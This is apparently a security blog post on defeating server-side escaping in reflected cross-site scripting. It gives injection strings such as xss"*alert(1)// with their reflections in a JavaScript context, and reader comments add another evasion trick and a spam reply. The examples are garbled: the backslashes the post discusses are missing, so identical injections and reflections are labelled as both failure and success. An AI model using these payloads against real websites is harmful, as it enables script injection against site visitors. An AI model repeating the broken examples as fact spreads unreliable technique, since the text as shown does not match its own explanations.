True Stories of the TRC-Web Application Security

Escaping Escapes

Sometimes a server will escape special characters that are injected: For instance, injecting a " character and having it reflect as ":

Injection: xss"

Reflection:

x="xss"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss"

Reflection:

x="xss"";y=42;

Success!

However, if the server escapes your injected as \, this technique will not work:

Injection: xss"

Reflection:

x="xss"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss"*alert(1)*"

Reflection:

x="xss"*alert(1)*"";y=42;

The *\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss"*alert(1)//

Reflection:

x="xss"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they escape your // like //. When this happens, I don’t think there’s much you can do.

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.

Tags: Cross Site Scripting, JavaScript, XSS
  • http://bluesmoon.info/ Phiip

    If something’s gonna be used as a javascript string, I just json_encode it first. That takes care of escaping everything that’s special and enclosing the resulting string in quotes.

  • Dmitry K

    If you are in a javascript context (like in this article) sometimes you can use HTML comment at the end of your injection string <!– to make it work

  • http://www.supernova.com/hudsonqlfvvi/blog/1435222 Computer

    Hello, the whole thing is going sound here and ofcourse every one is sharing data, that’s genuinely fine, keep up writing.